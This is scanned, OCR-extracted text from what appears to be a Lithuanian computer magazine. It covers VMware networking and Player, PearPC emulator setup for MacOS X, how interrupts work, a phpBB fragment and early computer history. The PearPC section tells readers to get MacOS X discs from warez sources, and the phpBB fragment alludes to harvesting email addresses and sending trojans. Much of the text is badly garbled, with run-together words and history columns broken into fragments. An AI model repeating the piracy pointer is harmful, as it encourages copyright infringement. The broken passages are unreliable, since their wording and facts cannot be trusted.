patvirtualaus kietojo disko dydį. Problemų gali iškilti tinklo 
konfigūravimo etape, todėl jį aptarsime kiek išsamiau. Ve- 
dlysištavęs pareikalaus pasirinkti vieną iš trijų variantų: 
Use bridged networking. Šiuo atveju virtuali mašina 


taps pilnaverčiu tinklo nariu su nuosavu IP adresu ir ly- 
giavertiškai veiks su likusiais klientais. 

Use NAT. Pasirinkus šį variantą, aktyvuojama tinklo 
adresų transliavimo (Network Address Translation) 
sistema, t.y. viešinčioji OS bus už NAT'o. Ji galės dirbti 
internete, tačiau kreiptis į ją tiesiogiai bus neįmanoma, 
kadangi už NAT ribų ji turės tą patį IP adresą, kaip ir 
pagrindinė (host) mašina. 

Use host-only networking. Šis variantas tiks tuomet, 
jeigu viešinčiai sistemai nereikia išeiti į išorinį tinklą (in- 
ternetą) ir jeigu pakanka ryšio tarp pagrindinės irviešin- 
čios sistemų. 

Donotusea network connection. Tinklas nebus naudo- 
jamas. Daugeliu atveju idealiai tiks pirmasis variantas, 
tačiau bet kokiu atveju reikėtų žiūrėti į konkrečią situa- 
ciją. Po to, kai virtuali mašina sukurta, galima imtis OS 
įdiegimo joje. Laimė, čia neturėtų iškilti jokių problemų, 
kadangi ši procedūra visiškai tokia pati, kaip irįdieginė- 
jantį paprastą kompiuterį. 

Virtualios mašinos paleidimui galima naudoti patį VM- 
ware Workstation arba specialų grotuvą VMware Player, 
kuris pagal nutylėjimą įtrauktas į programos sudėtį. Turiu 
pripažinti, jog kai pirmą kartą perskaičiau apie VMware 
Player paskirtį, iš karto pagalvojau: „Koks nenaudingas 
daiktas!“. VMware Player nemoka nei kurti, nei konfi- 
gūruoti, nei modifikuoti virtualių mašinų — jis jas gali tik 
paleisti. Kokia iš to nauda? Tačiau greitai paaiškėjo, kad 
Player nėra jau toks beviltiškas, kaip tai gali pasirodyti 
iš pirmo žvilgsnio, ir nauda iš jo yra. Spręsk pats: didelę 
laiko dalį vartotojas eikvoja būtent sukurtoms virtualioms 
mašinoms eksploatuoti, o ne kurti naujoms ar jau sukur- 
toms konfigūruoti, Taigi kam naudoti VMware Worksta- 
tion, kuri apkrauta visais įmanomais komponentais ir to 
rezultate veikia lėčiau, nei paprasta programa? Kur kas 
patogiau dirbti su nedidele minimalių funkcijų rinkinį tu- 
rinčia programa, kurios per akis užtenka. VMware Player 
atpažįsta 32 ir 64 bitų viešinčias operacinės sistemas, 
lengvaisusidoroja sutinklokonfigūravimu (bridge ir NAT) 
bei supranta bylas su Microsoft Virtual PC ir Virtual Ser- 
vervirtualiomis mašinomis, taip pat Symantec LiveState 
Recovery atvaizdus. Dar daugiau, VMware Player betku- 
riuo metu gali sustabdyti virtualios sistemos darbą, o po 
tobetkuriuo metu jį pratęsti nuo sustojimo taško, atstatant 
parametrus iš specialios sistemos nuotraukos (snaps- 
hot). Kiekvieną kartą laukti Linux užsikrovimo virtualioje 
sistemoje —tikrai varginantis užsiėmimas. Nuolat atmin- 
tyje laikyti viešinčią OS neracionalu. O snapshot'ų gali- 
mybė visiškai išsprendžia šią problemą: man pakanka 
nuspausti VMware Player ikonėlę, ir vos po kelių minučių 
aš savo dispozicijoje turėsiu darbui paruoštą sistemą. 
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Prieštai aptartos programos — VMware ir Virtual PC — 
yra programinės-aparatinės virtualios mašinos. Tai 
reiškia, kad jos programiškai emuliuoja virtualią viešin- 
Čių OS įrangą, tačiau tuo pat metu yra griežtai pririštos 
prie realios aparatūrinės įrangos ir naudojamos x86 
architektūros. Kitaip tariant, didžioji dalis operacijų vir- 
tualioje mašinoje vykdoma betarpiškai su kompiuterio 
įranga. Virtualių mašinų greitaveikos atžvilgiu toks po- 
žiūris atrodo naudingai, tačiau tuo pačiu jis rimtai apri- 
bojaviešinčių sistemų OS tipus, Su VMware ir VirtualPC 
galima paleisti Windows, Linux, BSD ir kitas OS, skirtas 
kompiuteriams su x86 architektūra, tačiau čia sąrašas 
ir pasibaigia. Apie, pavyzdžiui, MacOS X įdiegimą, kuri 
galbūt tave domina labiau nei kitos sistemos, teks pa- 
miršti, kadangi ši graži ir patikima OS veikia kitoje plat- 
formoje — Power PC. 

Tokį rimtą apribojimą visiškai pašalina programinės vir- 
tualios mašinos. Viena iš jų — PearPC, kurios pavadini- 
mas kilęs iš PowerPC Architecture Emulator (PowerPC 
architektūros emuliatorius). Tu tik įsivaizduok: kūrėjams 
pavyko sukurti visiškai kitos architektūros emuliavimo 
įrankį. Kitos! Su nuosavais registrais, mašininių instrukci- 
jurinkiniu, atmintiesvaldymuirt.t. Tai reiškia, kadvirtualus 
procesorius turi paimti kiekvieną mašininę PowerPC ko- 
mandą, ją dešifruoti (kad suprastų, kam ji skirta), o tada 
įvykdyti ekvivalentišką iš x86 instrukcijų sudarytą papro- 
gramę. Tuo pačiu jis turi tiksliai emuliuoti visas vėliavėlės, 
registrus ir vidinį aritmetinį-loginį mechanizmą, taip sie- 
kiant išvengti galimo rezultatų nesutapimo. Lenkiu savo 
žilą galvą prieš kūrėjus, kurie ne tik tai realizavo, bet ir 
visiškai nemokamai platina savo genialumo vaisius. Pe- 
arPC platinamas su atvirais išeities tekstais. 
Emuliatorius gali būti paleistas daugelyje POSIX-X11 
operacinių sistemų (visų pirma Linux'e) ir, be jokios 
abejonės, Windows tipo sistemose. Vietoje viešinčios 
OS buvo sėkmingai ištestuotos Mandrake Linux 9. 1 for 
PPC, Darwin for PPC ir, be jokios abejonės, MacOS X 
10.3. Siekiant pilnavertiško jų darbo, PearPC emuliuoja 
visą reikiamą aparatūrinę įrangą: 

*CPUJITC-X86: viena iš G3 procesoriaus modifikacijų. 
Virtuali mašina veikimo metu transformuoja PowerPC 
instrukcijas į x86 instrukcijas. Dalis iš jų yra kešuojama, 
dėlkopasiekiamas apčiuopiamas greičio padidėjimas. 
Tačiau netir įvertinus visus šiuos patobulinimus, viešinti 
OS veiks lėčiau, nei pagrindinė. 

*PCltiltas, USB, pertraukimų valdiklis, klaviatūra ir pelė 
— neatsiejamos bet kurio kompiuterio dalys. 

* IDE valdiklis, leidžiantis prijungti kietąjį diską ir CD- 
ROM (su pagrindinėje sistemoje saugomomis bylo- 
mis-atvaizdais). 

* Virtualus Ethernet valdiklis, kuris emuliuoja 3COM 
3C90x arba RealTek 8139. 

Nesunku numanyti, kad siekiant komfortiško viešinčios 
OS darbo, pagrindinio kompiuterio aparatūrinei įrangai 
keliami ganėtinai rimti reikalavimai. Be 512 Mb opera- 


tyvinės atminties ir poros GHz procesoriaus vargu ar iš 
viso verta bandyti įdieginėti MacOS X. Priešingu atve- 
ju paprasčiausiai rizikuoji susigadinti nuotaiką. Beje, 
viešinčios OS įdiegimo procedūra nėra tokia skaidri, 
kaip dviejų prieš tai aptartų produktų atveju. Konfigū- 
ravimas atliekamas per tekstinę konfigūracinę bylą, 
kas gali sukelti tam tikrų sunkumų. Siekiant to išvengti 
siūlau peržiūrėti įdiegimo procesą, remiantis MacOS X 
pavyzdžiu. 

1. Iš pradžių reikia į kokį nors kataloga (pavyzdžiui, CA 
PearPC) išpakuoti archyvą su programa (pearpc-0.4— 
win32-jitc.zip) bei archyvą su kietojo disko atvaizdo 
byla (pearpc-3gib.img.bz2). 

2. Poto mums prireiks diskų su MacOS X distributyvų. 
Deja, jie nėra laisvai prieinami, tačiau warezo resursuo- 
se jų gausu. Vienintelis keblumas tame, kad Mac CD 
diskams naudoja ypatingą failų sistemą, kurios Win- 
dows nesupranta. Norint išspręsti šią problemą, teks 
arbatransformuoti diskų atvaizdus į langinėms supran- 
tamą formatą (tai galima padaryti su Alcoho/ 12096), 
arba subičiuliauti langines ir Mac'ų failų sistemą (tam 
tiks MacDrive). 

3. Dabar apie konfigūravimą. Tekstinio konfigo pavyz- 
dysrandasi bylojeppccfg.example, tačiau čiareikiakai 
ką pakoreguoti. 

ppc. start resolution = *1024x768x32" 

Su šiuo parametru nurodoma emuliatoriaus ekrano re- 
zoliucijairspalvų gylis. Jeigu reikia, per(2ženklą galima 
nurodyti ekrano atnaujinimo dažnį. 

prom bootmethod = "select" 

Nurodome rankinį krovimosi metodą: paleidus virtualią 
mašiną, tu galėsi pats pasirinkti užkrovimo įrenginį. Rei- 
kalinga tam, kad būtų galima užsikrauti iš CD ir pradėti 
OSįdiegimą. 

memory. size=0x10000000 — šis parametras nurodo 
virtualiai mašinai išskiriamąoperatyvinės atminties kiekį 
(šiuo atveju 256 Mb). Pagal nutylėjimą viešinčiai OS re- 
zervuojama 128 Mb, tačiau to akivaizdžiai nepakanka. 
pci ide0 master installed = 1 

pci ide0 master image = pearpc-3gib.img 

pci ide0 master type = hd 

Nurodome bylą-atvaizdą virtualiam kietajam diskui. 
pci ide0 slave installed = 1 

pci ide0 slave image =0sx cd1.iso 

pci ide0 slave type = cdrom 

Prijungiame CD-ROM ir prie jo primontuojame pirmojo 
MacOS X įdiegimo disko atvaizdą. 

pci ril8139 installed = 1 

pci rtl8139 mac = de:ad:ca:fe:12:35 

Aktyvuojame tinklą (Realtek 8139 pagrindu veikianti 
plokštė) ir nurodome plokštės MAC adresą. 
4.Išsaugome konfigą r imamės PearPC paleidimo. Tam 
komandinėje eilutėje surink: 

cd cApearpc 

Ppc.exe ppcctg.example 
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Galbūt kas nors pasik 
būti vienareikšmišk 
platforma Unix S 
testuoti 
sistemc 


ys makaulę ir paklaus: „Tai kuri virtuali mašina geresnė?“. Atsak 


ir tiesiogiai priklauso nuo to, ko tu nori iš pačios virtualios m. 
temai 


inos, Jeigu tau reikalin 
s įdiegti ir eksperimentams iš langinių arba, priešingai, platforma Windows sis 
nix, tuomet universalioji VMware yra būtent tai, kotau reikia. Tuo atveju, kai tau reikiaviešinčio 
os (pavyzdžiui, nori maskuoti savo tikrosios sistemos parametrus), aš primygtinai rek 
Virtual Server.Visų pirm. produktas suteikia daugybę naudingų galimybių (nuotolinio admin 
ir automatizavimas su skriptais), o antra, ne taip paprasta naudojantis vien programinėmis priemonėmi 


jos buvimą. Kai kam tai gali būti yr aktualu. Kalbant apie nemokamą PearPC, jis kaip niek 
MacOS X įdie: 


Windows 


jt. Naudokis į sveikatą! 


Virtual Server 2005 


| rim jm 
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Pc Zone / 


Atitruk 


mMinuteėlei 


Pertraukimų veikimas operacinėse sistemose 


Ne paslaptis, kad pertraukimai yra svarbiausia 
operacinės sistemos darbo dalis. Tačiau ar tu kada nors 
susimąstydavai, kas jie tokie iš tiesų, kam jie reikalingi ir 
kaip jie veikia? Vargu. 


PERTRAUKIMAI 


Programiniai pertraukimai dažnai naudojami riboto 
kiekio operacinės sistemos branduolio funkcijų 
iškvietimams (sisteminiams iškvietimams) 


Ą 


Šiaip jau pertraukimai yra baisiai rimtas reikalas. Apie 
juos suprantamai ir aiškiai papasakoti gali toli gražu 
ne kiekvienas. 


VIDINIAI PERTRAUKIMAI, KURIE TAIP 
PATVADINAMI IŠIMTIMIS (EXCEPTION), 
SUSIDARO ĮVYKUS AVARINEI SITUACIJAI 
VYKDANTTAM TIKRAS PAČIOS PROGRAMOS 
INSTRUKCIJAS 


Pertraukimai ir išimtys 

Betkurioprocesoriaus architektūroje numatytiypatingiatvejai, 
kuomet procesorius nutraukia einamos programos vykdymą 
ir valdymą tuojau pat perduoda apdorojančiajai programai, 
kuri specialiai parašyta atitinkamos situacijos apdorojimui. 
Tokių situacijų nuolat pasitaiko visur. Norint tai suvokti, siūlau 
šiektiek pafantazuoti. Atsiribokime nuo šiuolaikinių daugiauž- 
duotinių sistemų, kurios apginkluotos galingais sisteminiais 
planuotojais, Tiesiog įsivaizduok, kad viso to nėra — yra tik 
„nuoga“ vieno procesoriaus sistema. Jeigu šiai sistemai duosi 
neįvykdomą užduotį, pavyzdžiui, paskaičiuoti tikslią skaičiaus 
Pireikšmę, tai ji tokią užduotį vykdys visą amžinybę. Anksčiau 


Programiniai pertraukimai susidaro vykdant ypatingą proceso- 
riaus komandą. Programuotojai juos naudoja specialiai — reikia- 
moje kodovietoje jie tiesiog palieka asemblerinę komandą INT, po 
jos nurodydami pertraukimo numerį. 


Prioritetizavimas ir pertraukimų maskavimas 
Pertraukimai turi prioritetą, pagal kurį nustatomas jų svarbos ir 


skubumo lygis. Pertraukimų mechanizmas turi gebėti prioriteti- 
zuoti ir maskuoti pertraukimus. 


MASKAVIMAS REIŠKIA, KAD SUTEIKIAMA 
GALIMYBĖ LAIKINAI MASKUOTI BET KOKIOS 
KLASĖS PERTRAUKIMUS NEPRIKLAUSOMAI NUO 
PRIORITETO LYGIO. 


ar vėliau šį procesą teks sustabdyti, tačiau kaip? Procesorius 
įnieką nereaguoja — jis tiesiog prakaituoja prie jam užduoto 
klausimo. Štai čia ir prireiks pertraukimų (angl. interrupt). Tu 
spaudi reikiamą klavišą ant klaviatūros, o valdiklis apie tai si- 
gnalizuoja procesoriui. Šis signalas su pranešimu iš esmės ir 


yra pertraukimas. Pastarasis suprantamas procesoriui, todėl 
jo vidiniai mechanizmai nutraukia einamos komandų sekos 
vykdymą ir kreipiasi į specialią paprogramę — pertraukimo 
apdorotuvą. Pagal nutylėjimą joje aprašyta daugybė įvairiau- 
sių situacijų (pavyzdžiui, mašinos perkrovimas nuspaudus 
Ctrl--Alt-Del), tačiau norint realizuoti proceso sustabdymą, jį 
reikia šiek tiek pakeisti. Pakanka į jį pridėti mums reikiamo kla- 
višo apdorojimą, kuriam būtų paskirtas veiksmas „sukurti skai- 
čiavimų užbaigimo vėliavėlę“ —ir viskas. Dabar, kai valdymas 
bus grąžintas programai, ji gaus ją sustabdančią vėliavėlę ir 
sustabdys skaičiavimus. 


Panašaus požiūrio laikėsi DOS programuotojai. Dabar, kai dau- 
giaužduotiniais mechanizmais užsiima pati OS, pačiam sukti gal- 
vąvisai nebūtina. O ir šiaip, dabar tiesiogiai kreiptis į pertraukimų 
apdorotuvus ne taip jau lengva. 


Vis dėlto pertraukimai kaip ir anksčiau vadovauja procesų plana- 
vimui — tiesiog tu to nepastebi. 


Pertraukimų tipai 

Mūsų aptartas pertraukimas — tai tik vienas konkretus atvejis. 
Iš tiesų kompiuteryje pasitaiko pačių įvairiausių pertraukimų, 
kuriuos juos galima suklasifikuoti. Priklausomai nuo šaltinio, jie 
dalinami į tris dideles klases: išoriniai, vidiniai ir programiniai. 
Išorinius pertraukimus inicijuoja aparatūrinių įrenginių (tiksliau 
sakant, jų valdiklių) signalai. Iš tokių įrenginių galima paminėti 
pačius įvairiausius įvedimo-išvedimo įrenginius, išorinius kau- 
piklius, įvairią periferiją (spausdintuvai, skeneriai) ir Lt. Būtent 
todėl išoriniai pertraukimai taip pat vadinami ir aparatūriniais. 
Jų būtinybę vaizdžiai demonstruoja prieš tai pateiktas pavyz- 
dys. Klaviatūros paspaudimai būtinai turi būti fiksuojami — juk 
pagal idėją jie turi turėti galimybę vienaip ar kitaip daryti įtaką 
tolimesnių skaičiavimų procesui. Tokie pertraukimai susidaro 
tarp dviejų kaimyninių instrukcijų vykdymo, o po pertraukimų 
apdorojimo sistema pratęsia proceso vykdymą, pradedant toli- 
mesne instrukcija. Vidiniai pertraukimai, kurie taip pat vadinami 
išimtimis (exception), susidaro įvykus avarinei situacijai vyk- 
dant tam tikras pačios programos instrukcijas. Išimčių pavyz- 
džiai yra dalinimas iš nulio, bandymas vartotojiškame režime 
įvykdyti privilegijuotą instrukciją ir panašiai. Jeigu nebūtų ati- 
tinkamų pertraukimų, tai raštingai susekti ir apdoroti išimtines 
situacijas būtų praktiškai neįmanoma. 
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Prioritetizavimas reiškia, kad visi egzistuojantys pertraukimus 
„gimdantys“ šaltiniai skirstomi į klases, savo ruožtu šioms kla- 
sėms suteikiami atitinkami pertraukimų užklausimo prioritetų 
lygiai. Prioritetai gali būti tiek santykiniai, tiek ir absoliutūs. 
Užklausos su santykiniais prioritetais aptarnaujamos taip, kad 
jeiguvienu metu gaunamos kelios skirtingų klasių užklausos, iš 
jų išrenkama ta, kuri turi aukščiausią prioritetą. Beje, pats per- 
traukimų apdorotuvas jokiu būdu negali būti sustabdytas. Tuo 
atveju, kai prioritetiškesniems pertraukimams leidžiama pri- 
stabdyti ne tokių prioritetiškų pertraukimų aptarnavimo proce- 
dūras, naudojama prioritetizacija su absoliučiais prioritetais. 
Tvarkingai aptarnauti pertraukimų užklausas net ir naudojant 
prioritetinį užklausų apdorojimą leidžia užklausų maskavimo 
mechanizmas. Tiesą sakant, aprašytoje absoliučių prioritetų 
schemoje naudojamas toks maskavimas: aptarnaujant tam 
tikrą pertraukimą visos užklausos su lygiu arba mažesniu pri- 
oritetu yra maskuojamos, t.y. neaptarnaujamos. Maskavimas 
reiškia, kad suteikiama galimybė laikinai maskuoti bet kokios 
klasės pertraukimus nepriklausomai nuo prioriteto lygio. Rea- 
liai tai suteikia daugybę galimybių. 


TADA Į KOMANDŲ SKAITIKLĮ UŽKRAUNAMAS 
PERTRAUKIMŲ APDOROTUVO ADRESAS, O Į 


SISTEMINIUS REGISTRUS UŽKRAUNAMI PERTRAUKIMO 
APDOROJIMO METU PROCESORIAUS DARBO REZIMĄ 


APIBRĖŽIANTYS DUOMENYS. 


Apdorojimas praktiškai 

Pateiksiu apibendrintą pertraukimo apdorojime naudojamų 
aparatūrinių ir programinių priemonių veiksmų seką. Iš pradžių 
atliekamas pirminis pertraukimo tipo atpažinimas. Tuo atveju, 
kai panašaus tipo pertraukimai šiuo metu draudžiami (naudo- 
jant maskavimą arba prioritetinę schemą), centrinis proceso- 
rius toliau vykdo jam perduodamas komandas. Priešingu atve- 
ju, priklausomai nuo į procesoriaus įėjimą perduotų duomenų, 
automatiškai iškviečiamas pertraukimo apdorotuvas, kurio 
adresas saugomas specialioje operacinės sistemos lentelėje 
(pertraukimų vektorių lentelė). 
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Pertraukimų 


Deskriptorinės 
pertraukimų 
lentelės registras 


Toliau automatiškai išsaugojama tam tikra nutraukto srauto (thre- 
ad) konteksto dalis, kuri leis branduoliui po pertraukimo apdoroji- 
mo atnaujinti pristabdytą procesą. Konkrečiau šnekant, išsaugo- 
mos komandų skaitiklio reikšmės bei mašinos būsenos žodžiai, 
kurie saugo pagrindinių procesoriaus darbo režimų požymius 
(tokio žodžio pavyzdys —/ntel Pentium procesoriuje naudojamas 
registras EFLAGS) irt.t. 


Tada į komandų skaitiklį užkraunamas pertraukimų apdorotuvo 
adresas, oį sisteminius registrus užkraunami pertraukimo apdo- 
rojimo metu procesoriaus darborežimą apibrėžiantys duomenys. 
Poto, kai operacinės sistemos branduolys apdorojo pertraukimą, 
atstatomas nutraukto proceso kontekstas, o kartu su juo nuo su- 
stabdymo vietos pratęsiamas ir proceso darbas. Dalis konteks- 
to atstatoma aparatūriškai po grįžimo iš pertraukimo komandos 
(pavyzdžiui, tolimesnės komandos adresas ir mašinos būsenos 
žodis), o dalis — programiškai, su aiškiomis duomenų išgavimo 
iš steko komandomis 


Tvarkingas pertraukimų iškviečiamų procedūrų planavimas — 
būtina sąlyga, kad vartotojiški srautai būtų teisingai suplanuoti. 
Priešingu atveju sistemoje gali susidaryti tokių situacijų, kuomet 
operacinė sistema bus ilgąlaiką užimta kokia nors juostinio įrengi- 
nio valdymo ir duomenų suspaudimo užduotimi, o santykinai grei- 
tas diskas tiesiog nieko neveiks. Tuo pačiu bus stabdomas dau- 
gybės programų veikimas, kurios dėl savo sandaros priverstos 
keistis duomenimis su šiuo disku. Norint sutvarkyti pertraukimų 
apdorotojų darbą, operacinėse sistemose naudojamas tas pats 
būdas, kuris naudojamas ir vartotojiškų procesų eilėms sutvarky- 
ti — prioritetinių eilių mechanizmas. 


lentelė 


PROGRAMINIAI PERTRAUKIMAI 


esoriaus 

tukcija (Intel Pentium procesoriuose ši komanda yra 
INT)valdymą leidžia perduoti paprogramei. Įvykdžiu 

eda apdoroti tokią pačią 

5 išorinį arba vidinį per 


traukimą, skirtumas 
ta numatytame E 
bėti, kad 


>, Kad pertraukimas įvyks. 
Inomame pr mos taške 


iuolaikinie oriai ko 


nių pertraukimų instruk: 
Jo tam, kad 
aryti kompakti 


rvuoja tam 

tikrą paprogramių s raminio pertraukimo 
komandoje operando, kuris rodo į reikiamą paprogramę 

a amę komandoje 
Pavyzdžiui, x8 esoriuje (paimsime jį dėl vaizdumo) 
numatyta galimybė panaudoti 256 pertraukimų apdo- 
rojimo į Ę dėl INT instrukcijoje operando ilgis 
yra vienas ) iškvietimui sk 
instrukci /isas ilg a ) labo vien 
tas). Koman 
apdorojimo paprogramių lentelė 
Vienas Kurių ir naudojam. Uu ko 
komandą CALL prireiktų jau ne 
turių baitų op do. Kita programinių pertraukimų 
panaudojimc )je įprastinių paprogramių timo 
in tis 
galima pakei: 


no, o dviejų arba ke- 


i ta, kad taip vartotojiška režimą 
ijuotą kartu su procedūros iškvie 
timu programinių pertraukimi vybę prip. 
daugę OCesOrit 


Tai reikia žinoti 

Bet kuris save gerbiantis programuotojas turi 
suprasti, kaip, kada ir kodėl vyksta pertrauki- 
mai. Be to praktiškai neįmanoma periminėti iš- 
imčių, teisingai formuoti glaudžiai su proceso- 
riumi dirbančio kodo. Darbui su pertraukimais 
praktiškai bet kuris programuotojas, atitinka- 
maiir hakeris, turi skirti daug laiko. Jie iš esmės 
padidina skaičiavimo sistemos efektyvumą ir 
stabilumą. 
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elioeuioju; Eipuog sąg/Anes sąuipuuBeg seujBaipį SEIMIPISĄ 


phpBB. Ji idie 


populiariausias forumas internete 


2, tai labai funkcionalus ir patogus produktas. Antra: po pusės meti 
š pagrindinio forumo 


kylėtą foruma 


Net ir tavo bobutė žino 
dviejų dalykų. Pirm 
nugvelbti (ir įtraukti į 
siuntinės trojanus. Tačiau mes su tavimi ne 


Mesvisac 


neriu bazes) visi pašto adresai, o nežinomas kenkėje 
tų žmonių, kurie nepagalvoję įdieginės populiarų ir 


sprendimai. Tiesa? 
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SCENA 


Analitinė Bebidžo mašina 

uvojs žmogaus proto pra. 
matikas, analitikas ir inžinierius 
abbage) buvo tikras, jog 
Joroti kur kas geriau už žmogų. Nuolat 
skaičiavimų klaidomis, Bebidžas ieškojo būdų 
zuoti, 0 1822 metais jis pradėjo įgyvendinti savo 
garinių inžinie 
) ir nebuvo pabaigta, kadangi jų kūrėjo 
Pirmu žymiu Carlzo išradimu tapo 
stalis- 
Javo rezultatą. Jis buvo 
aninių detalių ir svėrė apie 15 tonų 
irinkti veikiantį variantą ir su juo atlikti pir- 
po įmanoma tik 1990 metais. |Žymiausiu 
alitinė mašina, kuribuvon 
ųdizainųir schemų grandinė, kurias 


u daugeliu 


echanizmų 
na 
kotechnc 


variklis, kuris 


likdavo skaičiavimus su kelia 


mis ir a ai paruoš 


mechan oištisaįvairiau: 
autorit ginėjoirtestavo vogyvenimo galo. Analitinės 
mašinos y buvo ta, kad ją buvo galima programuoti panau 


todėl tuo metu tai buvo kažkas fantastiško. Tiek 
rvėlesnės Bet šoriškai vi 
tačiau jų architektūra 


kai ne- 


mašinos 


laikinius kompiuterius 


darą. Būtent todėl Carlzas laikomas 


tai bentjau pr 


jeigu ne 
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Mechaninis kompiuteris „Zuse“ 

30-aisia 3 lė t 
nijoje dirbęs inž 
vo atlikinėdama 
ilgai, o to meto te 


nusprendė 


s mei 


davo 
ais K 


nradas 


pasiler 


čiuotuvą Z1, galintį s kiojančiu 
kableliu, turėjo J p/ne“ principu 
(kaipirvisuo I aujame 
Z2 modelyje dalis mechaninių detalių buvo pakeista elektroninėmis 
0 1941 metais, kuor L ma te vadinti 
pir Ilyje eniniu kom- 
pluteriu, kuri lę, 0 


ne periokorte 
o karo pabaigoje per borT 
pastatu buvo sunaikinti ir vis 
Apparatebau bu 
įkūrė Ko! 
persikėlė Šveicariją, k 
Vokietijoje) ir 14 
kalbą Plė 


mo 


žaidimo 


apie sav 


gelio metų 
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ATRADIMAI, PAKEITĘ KOMPIUTERIŲ PASAUL | 


NUO MECHANINIO SKAIČIUOTUVO IK! 
INTERNETINIŲ TELEFONŲ 


l 


KOMPIUTERIŲ EVOLIUCIJATIK PRASIDEDA. NUO PIRMOJO ASMENINIO KOMPIUTERIO IŠRADIMO PRAĖJOVISOLABO 
40 METŲ, PER TĄ LAIKĄ JIS IŠ PRIMITYVAUS SKAIČIUOTUVO PAVIRTO GALINGU BENDRAVIMO, PRAMOGAVIMO IR 
PRAKTIŠKAI BETKOKIŲ UŽDUOČIŲ SPRENDIMO ĮRANKIU. ŠIAME PROCESE DALYVAVOTŪKSTANČIAI MOKSLININKŲ, 
KURIE KIEKVIENĄ KARTĄ SAVO ATRADIMAIS STEBINO PASAUL|. NORINTPILNAI APRAŠYTI KOMPIUTERIŲ ISTORIJĄ 
PRIREIKTŲ KELIŲ KNYGŲ, TAČIAUYRA DALYKŲ, KURIUOSTURĖTŲ ŽINOTI KIEKVIENAS KOMPIUTERISTAS. KUO |ŽYMI 
BEBIDŽO MAŠINA? KADA PRASIDĖJO MIKROPROCESORIŲ ERA? KAS SUKŪRĖ PIRMĄJĮ KOMPIUTERINĮ VIRUSĄ? 


RLBD 


ENIAC 


Kompiute 


oju stambiu kompiuteriniu 
1. Buvo manoma, kad jis b 

muojama mašina, galinti spręs 
čių. ENIAC 1 (Electronic Nume- 
1946 metų vasarį sukonstravo 
Mauchly) ir Persperas 
uvo skirtas amerikiečių 
skaičiavimams 
irimas vyriausybei 
ai tiek pat buvo iš- 
o tikras monstras 
nių vamzdžių, daugybės 
rė beveik 30 tonų. Ne 
eitindavo skaičia- 
alinimui būdavo 
aisant savo dydžio 


er) 


klis (Jo: 


to, kokiu neturėtų būti 
lų ENIAC kūrėjai pra 
es UNIVAC mašinas 
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Tranzistorius 
Tranzistorius — vienas įžymiaus 
įtakos kompiuterių sauliui. Pirmo) 
kuuminiais vamzd kurie buvo 
troje 40-ųjų pusėje mokslininkai iš 
skyriaus pradėjo eksperimentuoti su g 
tam tikroms sąlygoms galėjo ta 
metais Džonas Bardinas (John Barde 
Shockley) ir Volteris Breteinas (Walter 
tapo žinoma kaip tranzistorius. Bell mok 
išradimą, o tranzistoriai greitai pas j 
pagrinde buvo naudojami re 
tranzistoriai dar buvo labai tr 
vo. Tačiau progres 
naudoti ir kit 
nepatikimus vakuuminius va 
ti tuos pačius veiksmu: 
mažiau vietos 56 Me 
cingą išradimą gavo Nob 
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INVENTIONS 


Kietasis diskas (,„,„vinčesteris 
Pirmą kietąjį diską 1955 metų gegužę pristatė IBM. Toną svėręs ai 
gataslabiau priminėsunkvežimiovariklį.Vis dėlto perfokortų ir magne- 
tir laikais galimybė saugoti iki 5 milijonų simbolių skambėjo 
ai. Įrenginio viduje buvo penkiasdešimt 24 colių plokščių 
o kadangi skaitymo galvutė buvo viena, tai disko darbo greitis buvo 
Žas. Naujesniame modelyje (IBM 1301), kurį taip pat kūrė 
is Džonso! (Reynold Johnson), kiekvienai plokštei buvo 
skirta a a galvutė, kas kardinaliai padidino greitį. Daugelį metų 
kietieji diskai liko gremėzdiški ir buvo naudojami išskirtinai tyrimų cen- 
trų bei stambių kompanijų kompiuterių laboratorijose. 1980 metais 
agate Technology" pristatė ST-506 — pirmąjį 5 colių 5 megabaitų 
talpos kietąjį diską, kurį jau buvo galima naudoti asmeniniuose kom: 
piuteriuose ir kuris „vinčesterį“ padarė paplitusiu reiškiniu 


Integruota schema 

1958 metais du vi irtingose vietose gyvenantys moksli- 
ninkai išrado pr kai identišką integruotos schemos modelį 
Vienas jų, Džekas Kilbis (Jack Kilby), dirbo kompanijoje „Texas 
Instrumen o kitas, Robertas Noisas (Robert Noyce), buvo 
puslaidininkių gamybos kompanijos „Fairchild Semiconductor 
Corporation“ savininkas. Abu juos vienijo klausimas: „Kaip į mini- 
malų plotą sutalpinti maksimaliai daug komponentų?“. Tuo metu 
tranzistoriai, var kondensatoriai ir kitos detalės ant plokščių 
būdavo montuojamos atskirai, o mokslininkai nusprendė paban- 
dyti jas apjungti viename monolitiniame puslaidininkės medžia- 
gos kristale. Tiesa, Kilbis dirbo su germaniu, o Noisas — su sili- 
ciu. 1 metai gavo savo išradimų patentus. Savaime 
suprantama, po to prasidėjo dviejų kompanijų priešprieša, kuri 
pasibaigė taikos susitarimu ir bendros mikroschemų gamybos 
licencijc rimu. Po to, kai 1961 metais „Fairchild Semicon 
ductor Corporation" pradėjo laisvai pardavinėti mikroschemas, 
jas iš karto ėmė naudoti skaičiuotuvų ir kompiuterių gamyboje 
vietoje atskirų tranzistorių, kas leido žymiai sumažinti dydį ir pa- 
didinti našumą 


kt 


DL 
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FORTRAN 
Pirmoji tikra aukšto lygio programavimo kalba 
Mathematical Formula Transle 
metais. Jos autorius — Džor 
vęs IBM tyrinėtojų komandai »radžių Džonas su savo kolegoiT 
ruošėsisukurti IBM 701 (pirm merciškai vykęs IBM kompiuteris) 
skirtą interpretatorių. Darbas truko tre; per kuriuos buvo 
parašytas kompiliatorius, o p 
mavimo kalbos 


FORTRAN (IBM 
buvo sukurta 1957 
>hn W. Backus),vadova- 


g System) 


rogra 


aukšto 
iprantama kal- 
jau jų FORTRAN 
a netir 


naudojar 


tapo pirma ir iš tiesų populiaria ka 
dabar. Kalbą greitai pradėjo naudoti mokslininkai, kuriem: 
rašyti programas su daugybe formulių ir skaičių šiems tik 
FORTRAN tiko labiau nei asembleris. FORTRAN tapo pav 
tolimesnių programavimo kalbų autoriams ir suteikė stimulą HLL 
(high-level language) plėtojimuisi 


Grafinė vartotojo sąsaja ir pelė 

GUI ir pelės istorija tiesiogiai susi oNLine System (NLS) 
projektu, kuris buvo pradėtas 60-ųjų pradžioje Stenfordo tyrimų 
institute. Ši sistema, kuric imą rėmė ARPA, NASA ir Penta- 
gonas, amerikiečių mok turėjo 
terine aplinka ke Projektui 
Engelbartas (Douglas Engelbart), kuris 
Engelbarto sukurta grafinė aplinka buvo tek 
sistema, valdoma su specialiu įre 
glas. Iš pradžių mokslinink 
